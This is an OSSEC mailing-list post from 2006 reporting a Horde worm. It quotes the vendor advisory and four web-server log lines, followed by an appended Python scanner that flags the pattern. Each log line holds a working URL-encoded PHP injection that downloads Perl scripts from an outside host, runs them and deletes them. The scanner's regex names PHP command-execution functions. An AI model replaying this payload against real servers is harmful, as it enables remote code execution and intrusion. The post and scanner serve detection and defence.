
[ossec-list] Horde worm in the wild.



Is anyone noticing a new horde worm out there? It is related to the
following vulnerability (http://www.horde.org):

"
March 28th, 2006. The Horde Team has released a critical security fix
for the Horde Application Framework versions 3.0 and above. Version
2.x and earlier releases are not affected. The fixed Horde versions
3.0.10 and 3.1.1 are available. We strongly encourage every user to
update to the new versions immediately.

There are exploits in the wild for this vulnerability. They can only
exploit the user the webserver runs as, but are still serious. Please
upgrade now.
"

I'm getting alerts from ossec for the following logs (yes, my horde is
updated :)).
Is anyone seeing that?


217.160.242.70 - - [20/Jun/2006:13:41:22 -0300] "GET
/horde/services/help/?show=about&module=;%22.passthru(%22cd%20%22.chr(47).%22tmp;%20wget%20srv01.pollynet.com.br%22.chr(47).%22xx.txt;%20%20curl%20-O%20srv01.pollynet.com.br%22.chr(47).%22xx.txt;%20perl%20xx.txt;%20wget%20srv01.pollynet.com.br%22.chr(47).%22zone.txt;%20curl%20-O%20srv01.pollynet.com.br%22.chr(47).%22zone.txt;%20perl%20zone.txt;rm%20-rf%20xx.txt%20zone.txt%22);
HTTP/1.0" 200 38012 "-" "lwp-trivial/1.40"

204.14.90.21 - - [20/Jun/2006:19:00:34 -0300] "GET
/horde/services/help/?show=about&module=;%22.passthru(%22cd%20%22.chr(47).%22tmp;%20wget%20srv01.pollynet.com.br%22.chr(47).%22xx.txt;%20%20curl%20-O%20srv01.pollynet.com.br%22.chr(47).%22xx.txt;%20perl%20xx.txt;%20wget%20srv01.pollynet.com.br%22.chr(47).%22zone.txt;%20curl%20-O%20srv01.pollynet.com.br%22.chr(47).%22zone.txt;%20perl%20zone.txt;rm%20-rf%20xx.txt%20zone.txt%22);
HTTP/1.0" 200 37974 "-" "lwp-trivial/1.41"

204.14.90.21 - - [19/Jun/2006:03:07:23 -0300] "GET
/horde/services/help/?show=about&module=;%22.passthru(%22cd%20%22.chr(47).%22tmp;%20wget%20srv01.pollynet.com.br%22.chr(47).%22xx.txt;%20%20curl%20-O%20srv01.pollynet.com.br%22.chr(47).%22xx.txt;%20perl%20xx.txt;%20wget%20srv01.pollynet.com.br%22.chr(47).%22zone.txt;%20curl%20-O%20srv01.pollynet.com.br%22.chr(47).%22zone.txt;%20perl%20zone.txt;rm%20-rf%20xx.txt%20zone.txt%22);
HTTP/1.0" 200 37917 "-" "lwp-trivial/1.41"

69.16.208.123 - - [18/Jun/2006:11:15:13 -0300] "GET
/horde/services/help/?show=about&module=;%22.passthru(%22cd%20%22.chr(47).%22tmp;%20wget%20srv01.pollynet.com.br%22.chr(47).%22xx.txt;%20%20curl%20-O%20srv01.pollynet.com.br%22.chr(47).%22xx.txt;%20perl%20xx.txt;%20wget%20srv01.pollynet.com.br%22.chr(47).%22zone.txt;%20curl%20-O%20srv01.pollynet.com.br%22.chr(47).%22zone.txt;%20perl%20zone.txt;rm%20-rf%20xx.txt%20zone.txt%22);
HTTP/1.0" 200 37926 "-" "lwp-trivial/1.41"


Thanks,

--
Daniel B. Cid
dcid @ ( at ) ossec.net
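
A log check for the request pattern quoted in the post, as an added example that is not part of the original message and is not OSSEC's own rule logic. It URL-decodes the `module` parameter of requests to the Horde help viewer and flags values that are not a plain module name; the function names, the allowed character set and the sample records (documentation IPs, a harmless command) are assumptions made for the illustration.

```python
import re
from urllib.parse import urlsplit, unquote

# Apache common/combined log prefix: host ident user [time] "METHOD target PROTO" status
LOG_RE = re.compile(r'^(?P<src>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
                    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) ')
HELP_PATH = re.compile(r'/services/help/?$')
# Assumption: a legitimate module name is a plain identifier such as "imp".
SAFE_MODULE = re.compile(r'^[A-Za-z0-9_-]*$')
# PHP calls that run commands or code; passthru is the one seen in the quoted logs.
PHP_EXEC = re.compile(r'\b(passthru|system|exec|shell_exec|popen|proc_open|eval)\s*\(', re.I)

def inspect(line):
    """Return a finding dict for a suspicious help-viewer request, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    parts = urlsplit(m["target"])
    if not HELP_PATH.search(parts.path):
        return None
    # Split on "&" only: the injected value itself contains ";" characters.
    for pair in parts.query.split("&"):
        name, _, raw = pair.partition("=")
        value = unquote(raw)
        if unquote(name) != "module" or SAFE_MODULE.match(value):
            continue
        verdict = "php-exec" if PHP_EXEC.search(value) else "bad-module-value"
        return {"src": m["src"], "time": m["time"], "status": int(m["status"]),
                "verdict": verdict, "module": value}
    return None

def scan(lines):
    """Inspect every log line and keep only the findings."""
    return [f for f in map(inspect, lines) if f]

# Constructed sample records, one per line; not the log entries from the post.
SAMPLE = [
    '192.0.2.10 - - [01/Jan/2024:10:00:00 +0000] "GET /horde/services/help/'
    '?show=about&module=;%22.passthru(%22id%22); HTTP/1.0" 200 38012 "-" "lwp-trivial/1.41"',
    '192.0.2.11 - - [01/Jan/2024:10:01:00 +0000] "GET /horde/services/help/'
    '?show=about&module=imp HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '192.0.2.12 - - [01/Jan/2024:10:02:00 +0000] "GET /horde/services/help/'
    '?module=..%2F..%2Fetc HTTP/1.1" 404 300 "-" "-"',
]

if __name__ == "__main__":
    for finding in scan(SAMPLE):
        print(finding["src"], finding["status"], finding["verdict"], finding["module"])
```

The status code is reported but not used for the verdict, since the requests in the post were answered with 200 by a Horde that had already been updated. Records that a mail client has wrapped over several lines, as in the post, must be rejoined into one line each before scanning.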

OSSEC project: www.ossec.net.
Mailing list information: http://www.ossec.net/en/mailing_lists.html.